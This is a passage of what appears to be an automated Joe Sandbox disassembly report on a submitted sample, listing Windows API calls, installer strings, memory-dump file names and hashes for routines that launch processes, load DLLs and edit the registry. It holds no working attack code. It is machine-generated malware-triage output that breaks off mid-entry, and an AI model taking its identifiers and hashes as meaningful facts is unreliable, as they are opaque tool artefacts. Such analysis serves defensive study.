                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426576,759223A0,00000000), ref: 00404FF9
                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
                                                                                    • FreeLibrary.KERNEL32(?,?), ref: 004024C3
                                                                                    Strings
                                                                                    • Error registering DLL: Could not initialize OLE, xrefs: 004024F1
                                                                                    • Error registering DLL: %s not found in %s, xrefs: 0040249A
                                                                                    • Error registering DLL: Could not load %s, xrefs: 004024DB
                                                                                    • `G, xrefs: 0040246E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
                                                                                    • String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s$`G
                                                                                    • API String ID: 1033533793-4193110038
                                                                                    • Opcode ID: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                    • Instruction ID: ac94b2829880799def153f2ab6d9fb01897d962df66ba524602deb4d09d833fb
                                                                                    • Opcode Fuzzy Hash: dfa9fb55bab39987c49c05a208fb72d841c7d3de21fe9f712437cd20c315518e
                                                                                    • Instruction Fuzzy Hash: AE21A635A00215FBDF20AFA1CE49A9D7E71AB44318F30817BF512761E1D6BD4A80DA5D
                                                                                    APIs
                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 00403E10
                                                                                    • GetSysColor.USER32(00000000), ref: 00403E2C
                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00403E38
                                                                                    • SetBkMode.GDI32(?,?), ref: 00403E44
                                                                                    • GetSysColor.USER32(?), ref: 00403E57
                                                                                    • SetBkColor.GDI32(?,?), ref: 00403E67
                                                                                    • DeleteObject.GDI32(?), ref: 00403E81
                                                                                    • CreateBrushIndirect.GDI32(?), ref: 00403E8B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                    • String ID:
                                                                                    • API String ID: 2320649405-0
                                                                                    • Opcode ID: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                    • Instruction ID: 46e75ec11a9703e62b9e59528547c83071966f0b6f932d53464b5ad1ffaeee7a
                                                                                    • Opcode Fuzzy Hash: 2cd1843f4009558aed8999710a19f2fd839bd0fd7577925b5fb66d8747ca327a
                                                                                    • Instruction Fuzzy Hash: CA116371500744ABCB219F78DD08B5BBFF8AF40715F048A2AE895E22A1D738DA44CB94
                                                                                    APIs
                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426576,759223A0,00000000), ref: 00404FD6
                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426576,759223A0,00000000), ref: 00404FE6
                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426576,759223A0,00000000), ref: 00404FF9
                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059
                                                                                      • Part of subcall function 00405C6B: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00461DD0,Error launching installer), ref: 00405C90
                                                                                      • Part of subcall function 00405C6B: CloseHandle.KERNEL32(?), ref: 00405C9D
                                                                                    • WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
                                                                                    • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2
                                                                                    Strings
                                                                                    • Exec: failed createprocess ("%s"), xrefs: 004022C2
                                                                                    • Exec: success ("%s"), xrefs: 00402263
                                                                                    • Exec: command="%s", xrefs: 00402241
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
                                                                                    • String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
                                                                                    • API String ID: 2014279497-3433828417
                                                                                    • Opcode ID: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                    • Instruction ID: 042007ee205ef60e30064d08c60082207347e2967af2fac5581f577c4c1081ae
                                                                                    • Opcode Fuzzy Hash: 6019f50a09c3a98591d7ac19e214774b8a762e16cd0fcb62cdb4911ff5dda7cf
                                                                                    • Instruction Fuzzy Hash: 4E11A332504115EBDB01BFE1DE49AAE3A62EF04324B24807FF502B51D2C7BD4D51DA9D
                                                                                    APIs
                                                                                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404895
                                                                                    • GetMessagePos.USER32 ref: 0040489D
                                                                                    • ScreenToClient.USER32(?,?), ref: 004048B5
                                                                                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 004048C7
                                                                                    • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048ED
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: Message$Send$ClientScreen
                                                                                    • String ID: f
                                                                                    • API String ID: 41195575-1993550816
                                                                                    • Opcode ID: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                    • Instruction ID: ebefa7930bdcd0e41c689069c6d494cf412fee4c497549fa98469d3d4217857c
                                                                                    • Opcode Fuzzy Hash: dd0771fa492b48a0b3c5816c4430d79e7bf8162a268c2264a59d8032563336e2
                                                                                    • Instruction Fuzzy Hash: 7A019E72A00219BAEB00DB94CC85BEEBBB8AF44710F10412ABB10B61D0C3B45A058BA4
                                                                                    APIs
                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
                                                                                    • MulDiv.KERNEL32(0008C800,00000064,001B7287), ref: 00403295
                                                                                    • wsprintfW.USER32 ref: 004032A5
                                                                                    • SetWindowTextW.USER32(?,?), ref: 004032B5
                                                                                    • SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7
                                                                                    Strings
                                                                                    • verifying installer: %d%%, xrefs: 0040329F
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                    • String ID: verifying installer: %d%%
                                                                                    • API String ID: 1451636040-82062127
                                                                                    • Opcode ID: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                    • Instruction ID: b5f4dff99bd495ec87a9693a0662ffae913500554fa258d9a040327637eece45
                                                                                    • Opcode Fuzzy Hash: 3861699fe6b90eb98aefdbb76a6aac10e2c6ef9ed100297db3f2db1cf1739afe
                                                                                    • Instruction Fuzzy Hash: F8014470640109BBEF109F60DC4AFEE3B68AB00309F008439FA05E51E1DB789A55CF58
                                                                                    APIs
                                                                                    • CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                    • CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                    • CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                    • CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: Char$Next$Prev
                                                                                    • String ID: *?|<>/":
                                                                                    • API String ID: 589700163-165019052
                                                                                    • Opcode ID: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                    • Instruction ID: be175804d259169a812840791ea7ca7df426672d81dd27f3292f2fdf866f60ab
                                                                                    • Opcode Fuzzy Hash: 45da571b5baffeb551c3f596f843ba1ccba930a874212f5238eaf5e1151c3a30
                                                                                    • Instruction Fuzzy Hash: E311C81188022159DB30FB698C4497776F8AE55750716843FE9CAF32C1E7BCDC9182BD
                                                                                    APIs
                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
                                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401504
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00401529
                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                    • String ID:
                                                                                    • API String ID: 1912718029-0
                                                                                    • Opcode ID: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                    • Instruction ID: c67b0bc93acae55c3864b02ebd95f02f7c15995ce12be8144693d1f813214158
                                                                                    • Opcode Fuzzy Hash: 2a270dabeadf4e4f1a4763114e85c5fdf2352e77b68d80cc92c62b7e226f3bc1
                                                                                    • Instruction Fuzzy Hash: EB117976500008FFDF119F90ED859AA3B7AFB84348F004476FA0AB5070D3358E509A29
                                                                                    APIs
                                                                                    • GetDlgItem.USER32(?), ref: 004020A3
                                                                                    • GetClientRect.USER32(00000000,?), ref: 004020B0
                                                                                    • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
                                                                                    • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
                                                                                    • DeleteObject.GDI32(00000000), ref: 004020EE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                    • String ID:
                                                                                    • API String ID: 1849352358-0
                                                                                    • Opcode ID: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                    • Instruction ID: 8f71947f799b2f64a69df86d2a8dcb393400c967cd863db52f2ee5b4f8782dab
                                                                                    • Opcode Fuzzy Hash: 06a5835b44d3b6ac96e348dee9128c473dfe3a95b4f6450d10307ae5d6bb1818
                                                                                    • Instruction Fuzzy Hash: 9DF012B2A00104BFE700EBA4EE89DEFBBBCEB04305B104575F502F6162C6759E418B28
                                                                                    APIs
                                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
                                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Timeout
                                                                                    • String ID: !
                                                                                    • API String ID: 1777923405-2657877971
                                                                                    • Opcode ID: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                    • Instruction ID: 6a5c1514d43e21eed083d94b15ba6593763dc9af2b3e6337d8774d5f4809249f
                                                                                    • Opcode Fuzzy Hash: e47ff439633ded3fb17ec5eecd0e1b6806a5c9fa211e2190a11df636c871b995
                                                                                    • Instruction Fuzzy Hash: 56217171900209BADF15AFB4D886ABE7BB9EF04349F10413EF602F60E2D6794A40D758
                                                                                    APIs
                                                                                    • lstrlenW.KERNEL32(00451D98,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00451D98,?), ref: 00404476
                                                                                    • wsprintfW.USER32 ref: 00404483
                                                                                    • SetDlgItemTextW.USER32(?,00451D98,000000DF), ref: 00404496
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: ItemTextlstrlenwsprintf
                                                                                    • String ID: %u.%u%s%s
                                                                                    • API String ID: 3540041739-3551169577
                                                                                    • Opcode ID: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                    • Instruction ID: 019992b557dc20c415266b5889428492ee6a52d86c3b4952972254649920ef77
                                                                                    • Opcode Fuzzy Hash: a810ffe09f2dc908503b2f58e47bd406bb4654f19e43ddd30bdf0acdc5011288
                                                                                    • Instruction Fuzzy Hash: DC11527270021477CF10AA699D45F9E765EEBC5334F10423BF519F31E1D6388A158259
                                                                                    APIs
                                                                                      • Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B
                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 0040282E
                                                                                    • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E
                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                    Strings
                                                                                    • DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
                                                                                    • DeleteRegKey: "%s\%s", xrefs: 00402843
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseDeleteOpenValuelstrlenwvsprintf
                                                                                    • String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
                                                                                    • API String ID: 1697273262-1764544995
                                                                                    • Opcode ID: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                    • Instruction ID: 70287f52249eeba914cab3bee2f8f529b2cd5257afac1a85b0186071c419a2a5
                                                                                    • Opcode Fuzzy Hash: 1c7787f783619d22a727722e8428d119ca1e8f511c7c384e8364c1fbbf216132
                                                                                    • Instruction Fuzzy Hash: 2511E732E00200ABDB10FFA5DD4AABE3A64EF40354F10403FF50AB61D2D6798E50C6AD
                                                                                    APIs
                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                      • Part of subcall function 00406301: FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                      • Part of subcall function 00406301: FindClose.KERNEL32(00000000), ref: 00406318
                                                                                    • lstrlenW.KERNEL32 ref: 004026B4
                                                                                    • lstrlenW.KERNEL32(00000000), ref: 004026C1
                                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 004026EC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115771275.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_nikDoCvpJa.jbxd
                                                                                    Similarity
                                                                                    • API ID: lstrlen$FileFind$CloseFirstOperationwvsprintf
                                                                                    • String ID: CopyFiles "%s"->"%s"
                                                                                    • API String ID: 2577523808-3778932970
                                                                                    • Opcode ID: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                    • Instruction ID: 7c1d43f40acf3f33c375e3424532232737b5c7d4dc38a4161669d523a66d0fcf
                                                                                    • Opcode Fuzzy Hash: 0c98d155eaf4bf30867e20e2ef9323f8e108a065a1149d83459e1735f252947f
                                                                                    • Instruction Fuzzy Hash: 8A114F71D00214AADB10FFF6984699FBBBCAF44354B10843BA502F72D2E67989418759
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2115606939.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2115581137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115627335.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2115647948.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
